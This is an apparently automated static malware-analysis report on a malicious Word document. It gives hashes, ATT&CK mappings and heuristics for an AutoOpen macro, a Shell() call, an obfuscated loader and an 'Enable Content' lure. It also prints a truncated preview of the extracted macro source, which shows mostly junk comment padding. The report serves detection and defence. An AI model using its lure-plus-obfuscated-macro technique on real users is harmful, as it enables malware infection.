Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8d368ea4bb3b473e…

MALICIOUS

Office (OLE)

Size: 215.5 KB
Created: 2018-10-22 14:01:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 37576661ce0684a712f81046a8e52948
SHA-1: f4110ea19e2641fa3ad0528ed6f27a2ceb3426f9
SHA-256: 8d368ea4bb3b473e7a927e98fb33d67c84de5bce2656179004c06b04fea81485
Risk Score: 322

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Microsoft Word document containing obfuscated VBA macros. The document body instructs the user to 'Enable Content' to display the document, a common lure for macro-based malware. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, suggesting the macro attempts to execute external commands or payloads. The presence of a VBA auto-execute macro (AutoOpen) further supports this malicious intent.

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6923090-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 166924 bytes
SHA-256: 0a58d8d6de496369872664f83d78978570853cbd7cc53a4cf286882c42fae0cd
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' tu ndfcu bnE ioEc u hio.uh.enunF idnuu nSh.I c uhfch n  n
' STndbeu ubd F TcEchcddnhTu  FE fbnn nneto.onnint e tid t.nISnu  eEF Te nnh   .u nuitfI.o.tnhiud
'  dcncn Tin eFFutFIuT  hEIfo   inFESnnu ccI ffI tn ddETdnI Ebuuo Tfo u  TefdhfEb
' hnnuTnutInbFnb  unIn oEutnenueFuSunndEh nIShE nen hidfnFenIbdeb
' cuoT ndf InuFTfuT buFth.noucuonun
' hfu.eddFnchFc  nucbnuEFcoTTfdt .Sn h ufnnuhn TSunete
'  n uuEnTf  EeuTuSTnT.tonSdEchnih .F IIc  ETnFdSunnEFnne .iutnb.nunntS
' hcIuIn fnFdfn oof.b.Iuu  n..heftnhTnIfnE ho dEFcd.dSud
' .En  bbindSTnnTF  uFnc h ETETTf n.uonnnbEnb  hhESI .nSnbunebSd uE ieu  tc.dSu Itci.n  Iu.u neEnn
' ETIFFIu IietetSSbunnte ehTfuiiS i  u hennnu Sn
' uncTnuoeuIISiT EShid fI    nT oinciuEETucoEneonntTtE nenuEod Eob
'  un  tb nfbodunTTFShn Fb cTFfEEn no fbine.ncuih.cn.di ucFETT u d . Seo  FunEtunF n
' oncTfctcF .  ncnT i nE bd ieunn dInIIn io e htin Fbnu T.  nT .nn Soohhnnn oS F
' ndubcoF d bEdFn f.tnchdItIuedbtTc  ou T .hbSIuSnn EbSE
'  TEeb.uufuci eu tIitt noFno.ct Tdtu.hnnIuuinc ee tnfn ndbuenSoFeFcb ndftnnutE enIh uuFeh nIEh
' t  TTE fni .IutnnSuno Inibb.SunF   u hni .c EnInS.f ifittfun
' Sn eud  oiF hnfu  bd  tefiuuTtcd n bEceuuihodf
'  hdEuitoFhTI e .hT E .hoSdT  huc F nnunfEo u Iuu o nFI  SS  n.onbET.bnT
'  IhInEfu bn E ntIi c t.T bfu SEefe n EfT dn .bde .Fdud o   i ceIFIchunE
' ntfI   c efncShod FTunT.ndffeS.un ein h En bnicfoudne.TIu o   nFo.EcF
' oe   TdTb Fn        uShFedntTe cIbhIIi n nEouucc IdEohnnne  ni n noFn nun.e id.b cT Tn nn  n
' h.t  i eI e uhTE   unF.IifoI hi hTuiSF T nnincbTeTFt.ounnf.I.od.TTeunu ndSI bt
' Fefnoe un.ihIobunoeuFdtnnb n nu n hfthdfhdd. nEt In.n.nnin  hun .f dEeEftdbtun nbEcu
' fuIhb t.duuuu.ebiE.  i  c th  nt fT ocFnIdh nFnutbecincTSnI  dnSbunb n i
' uncT.F nEff nn  euT FIfddnnnfTF Fco t.ehcnbin n.nuo
' ni EtnoFtnon.h necdn tcuu.cn   IihedntIEucEunbnF ToSSnnTeohuItInfnncinnnoEuuhdcnef ub E.du uSiu
'  E  TEcunIufF e  nnd.IuuiTb cctncn bfSn nhTc..cSItIEinfnnIn un . dtothnFehSu.ch.
'   fSuh ocEn  enuFo nhnhi onfut  unnnb cin.f .oF cdbbe deo.n uo n.nenh t EntniI nftun SdIb.Ti
'  et  binIuncFbho t If.nhhcTnfTtu . t
' bunu .  Ie tef i tobuSd.tifE  Eft  FuhneEninFf ibE tfnFfSnF
' uin T Eiee cnI n. n ITSdnnnThbnb EeoSFuFF  edTTecdn  ub u  o  EEIuodTubF buc S dSuFc nuo EnIhodThSu
'   d u n ToEf.h  hc fTfE Eu Ehn.no bdinbni nnn  i ecTeeSt
' bo udEEudduSSo cid .F fSInFeTIF. EEunnn i  Tnbnfochonot .cenSFubf
' uTfFTnTTFbeSuneot. ehunbdh n. nff ictI.bnf  ci Iontnu
' thIhScbFSt  e dnb id.E F nndneF buF u hncnn Ton  .Euu uhe
' Eotd.EonuTciuccc nSnuiude.Fi S  u .nFne   uSo Tnun nhFn .e Suif
' En uinniI huibni uuduu.fc f  ccu nodcTeIoctt   hI   unuoenifh.itnnndtcTeT Effd .noiceSdbuETufSt
' cuS Sdc EIbuno nutohohb   I n  cudISiS cun c nhn ff .ucI odnun nSu nnuTEbtt FneuI Ffb.Tnf
' nu nFtch  dnnchu ef  unt  enh uSEi  nub. dhTiEtffhSehuieS n bdhnI F  cEni nneo t.ucdbndn  nidE TTn
' neSFh    bFhbnu dfuEnunbnFdhnncSTn FSft.EncuTdEncTut I hohFTnTh hn nen
'  d  u ui  . huub SSu cheTnFdEE
' d.tfoc  EI FT  c.h b e.iEnd  FE.n.bionFuEb Eef nc T
'  hotuhnudnuuenbFbutffoo cE.InIhEt. TciE ci o ouo Sdib.nfSuddnt
' t tEi beI n .f Etn tf hfuuuEbtuuuTnofnhcoh i b.iu  SS  I nInSfS doFbcIStT hdbon
' cnuFn E SitnSSn n.noftuf Eu  eueE tu eut nT
' n . fnoI on  bnho Scn bbnc n.unEt..u .nhSu unibFFSnIEbtn.o E E hi h b  T.hhSbnu n dboi   u
' n u.uhEtFT Ftecn.u  ueeo nnnInui  n nn nIeio . cnud.Efu T ofon
' n neEEnni.EI  on ninh.hbnnfEEon  EFTn  neSiFndF b TnnTdbo
' ccItnTootSbu uunSSih  nfnE nf uE .It bnnT..bb  .d I uecu.
' FbIhItTuicI   di nSueoeEndS nnuFtf
' bIcbuE . f it fiTonb.F ucIFeu i uuduSbnI .
' fnuI .bh c uS  hfStbnEfoununIubontT n. f u nnnonF dF difFi
' EuIodF FoeubTt inIfnh S uoEhc STh   ouuubd
'  nbniinin utdbbT.no.  bntn edI .fbh  f. ht
... (truncated)